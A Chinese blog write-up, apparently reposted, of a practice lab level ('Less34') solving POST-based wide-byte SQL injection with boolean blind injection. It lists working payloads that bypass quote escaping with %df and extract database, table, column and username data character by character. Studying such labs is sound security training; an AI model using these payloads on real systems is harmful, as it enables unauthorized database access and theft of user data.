当前位置:网站首页>SQL注入 Less34(POST型宽字节注入+布尔盲注)
SQL注入 Less34(POST型宽字节注入+布尔盲注)
2022-07-28 20:30:00 【开心星人】
前置知识:【Try to Hack】宽字节注入
尝试万能密码' or 1#
进行了转义,使用宽字节注入%df' or 1#
发现没有效果,并且%df直接显示出来了(之前都是显示不出来,是一个问号的图形)
抓包,发现对%进行了URL编码1%25df%27+or+1%23
我们用burp进行宽字节注入即可%df' or 1#
%df' or length(database())=8#
%df' or ascii(substr(database(),1,1))=115#
%df' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#
%df' or ascii(substr((select column_name from information _schema.columns where table_name="users" limit 0,1),1,1))=105#
因为"users"用到了引号,使用子查询或者16进制方式(十六进制成功了,但子查询,出来点问题)%df' or ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))=105#
%df' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=(select table_schema from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)),1,1))=105#
%df' or ascii(substr((select username from users limit 0,1), 1,1))=68#
边栏推荐
- Chapter 7: drawing rotating cubes
- The binary search boundary value processing based on leetcode35 is used to clarify the boundary value of the judgment condition using the idea of interval
- 【云原生之kubernetes】在kubernetes集群下的映射外部服务—Eendpoint
- HCIA comprehensive experiment (take Huawei ENSP as an example)
- Oracle database objects
- Ordinary practice of JS DOM programming
- 小程序 组件 定时器的清除
- PCB材料简单介绍
- Two global variables__ Dirname and__ Further introduction to common functions of filename and FS modules
- How does MySQL archive data?
猜你喜欢
39. 组合总和
![[hero planet July training leetcode problem solving daily] dynamic planning on the 28th](/img/79/bc763bb6f12c525454abda18be4265.png)
[hero planet July training leetcode problem solving daily] dynamic planning on the 28th
Desai wisdom number - line chart (stacking area chart): ranking of deposits of different occupational groups in the proportion of monthly income in 2022
Leetcode · 581. shortest unordered continuous subarray · double pointer
CDN工作原理
记录Flutter解决A RenderFlex overflowed by 7.3 pixels on the bottom溢出问题
For the first time, Chinese scientists used DNA to construct convolutional artificial neural network, which can complete 32 types of molecular pattern recognition tasks, or be used for biomarker signa
Intranet penetration learning (III) horizontal movement of domain - planning tasks
In Kingbase, the user is specified to search the schema by default, or the user cannot use the function under the public schema
msfvenom制作主控与被控端
随机推荐
Ukrainian officials: half of Ukrainian agricultural products are exported through the Danube port
In Kingbase, the user is specified to search the schema by default, or the user cannot use the function under the public schema
Clearing of applet component timer
【NLP】生成词云
kali里的powersploit、evasion、weevely等工具的杂项记录
Oracle database objects
DHCP and PPPoE protocols and packet capture analysis
Data visualization news, different forms of news reports
罗克韦尔AB PLC RSLogix数字量IO模块基本介绍
Summary of the use of hash table set and map when leetcode brushes questions
KubeVela 1.4.x 官方文档
Rhcsa first day
HCIP(10)
HCIP(14)
Openeuler embedded sig | distributed soft bus
DHCP和PPPoE协议以及抓包分析
Esp8266 Arduino programming example - timer and interrupt
Apifox: satisfy all your fantasies about API
Intranet penetration learning (III) horizontal movement of domain - planning tasks
Hcip seventh experiment